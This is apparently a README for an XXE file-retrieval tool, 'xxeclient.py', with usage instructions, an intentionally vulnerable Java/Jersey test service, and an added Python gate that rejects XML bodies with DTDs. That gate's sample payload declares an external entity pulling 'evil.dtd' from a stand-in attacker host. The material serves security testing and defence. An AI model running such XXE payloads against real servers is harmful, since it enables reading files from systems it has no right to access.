by AonCyberLabs

214 Stars 86 Forks Last release: Not found GNU General Public License v2.0 3 Commits 0 Releases



This tool exploits XXE to retrieve files from a target server. It obtains directory listings and recursively downloads file contents.


The script has to be slightly modified to work with different web sites / web services:

* Set
  according to your target
* Change the XML data and the URL of your evil.dtd in the
* Modify the
  method to parse the file content from the response.
* For https: Change the
  method to use

Also, make sure you make the DTD

available to the server:

```
python -m SimpleHTTPServer 5678
```

```
python xxeclient.py -h
usage: xxeclient.py [-h] path [path ...]

Retrieves files via XXE

positional arguments:
  path        path(s) to the retrieve (e.g. /etc/)

optional arguments:
  -h, --help  show this help message and exit
```

Vulnerable Example Web Service

The files in

contain a sample vulnerable RESTful web service written in Java using Jersey (inspired by [1]).

To compile and run it using maven run:

```
mvn jetty:run
```

The JSON and XML files in

can be used to debug the web service with curl:

```
curl -v -H "Content-Type:application/json" --upload-file initial.json http://localhost:8080/api/user
curl -v -H "Content-Type:application/xml" --upload-file cdata.xml http://localhost:8080/api/user
```
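The sample service above is vulnerable because its XML parser honours DTDs, which is exactly what a client like xxeclient.py relies on (a parameter entity that pulls an external DTD such as evil.dtd). The following is an added example, not code from this repository: a request-side check, built only on Python's standard-library expat bindings, that reports the DTD constructs in an incoming XML body without resolving any of them, plus a gate that rejects every body carrying a DOCTYPE. The sample bodies and the host name `attacker.invalid` are constructed for the example.

```python
import xml.parsers.expat

# Constructed sample request bodies (illustrative, not from the repository).
SAFE_XML = '<?xml version="1.0"?><user><name>alice</name></user>'

# The shape of request an XXE client sends: a parameter entity that pulls an
# external DTD (the evil.dtd the README serves with SimpleHTTPServer).
# The host name is a placeholder.
EXTERNAL_DTD_XML = (
    '<?xml version="1.0"?>'
    '<!DOCTYPE user [ <!ENTITY % dtd SYSTEM "http://attacker.invalid/evil.dtd"> %dtd; ]>'
    '<user><name>bob</name></user>'
)

# A harmless-looking internal entity: still a DTD, so still rejected by policy.
INTERNAL_ENTITY_XML = (
    '<?xml version="1.0"?>'
    '<!DOCTYPE user [ <!ENTITY greeting "hello"> ]>'
    '<user><name>&greeting;</name></user>'
)


def inspect_xml(body):
    """Report the DTD constructs in an XML body without resolving any of them.

    Only expat's declaration callbacks are used and no ExternalEntityRefHandler
    is installed, so nothing is fetched from the network or the filesystem.
    """
    findings = {"doctype": False, "external_entities": [], "internal_entities": []}
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        findings["doctype"] = True

    def on_entity_decl(name, is_parameter, value, base, system_id, public_id, notation):
        # A SYSTEM or PUBLIC identifier means the entity body lives outside the document.
        kind = "%" + name if is_parameter else name
        if system_id is not None or public_id is not None:
            findings["external_entities"].append(kind)
        else:
            findings["internal_entities"].append(kind)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.Parse(body, True)
    return findings


def accept_xml_body(body):
    """Gate for an XML endpoint: accept only bodies that carry no DTD at all.

    Returns (accepted, reason). Refusing every DOCTYPE is the same policy as
    disabling DTDs on the server-side parser; it costs nothing for a REST API
    that never needs them.
    """
    try:
        findings = inspect_xml(body)
    except xml.parsers.expat.ExpatError as exc:
        return False, "malformed XML: %s" % exc
    if findings["external_entities"]:
        return False, "external entity declared: " + ", ".join(findings["external_entities"])
    if findings["doctype"]:
        return False, "DOCTYPE not allowed"
    return True, "ok"


if __name__ == "__main__":
    samples = [("safe", SAFE_XML), ("external dtd", EXTERNAL_DTD_XML),
               ("internal entity", INTERNAL_ENTITY_XML)]
    for label, body in samples:
        print(label, accept_xml_body(body))
```

For the Java/Jersey service in this repository the parser-level equivalent is to disable DTD processing on the XML parser it uses, for example by enabling the Xerces feature `http://apache.org/xml/features/disallow-doctype-decl`; the Python check above is the same policy applied at the request boundary, and its `inspect_xml` report is also useful as a detection signal in request logs.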

[1] https://github.com/rgerganov/xxe-example
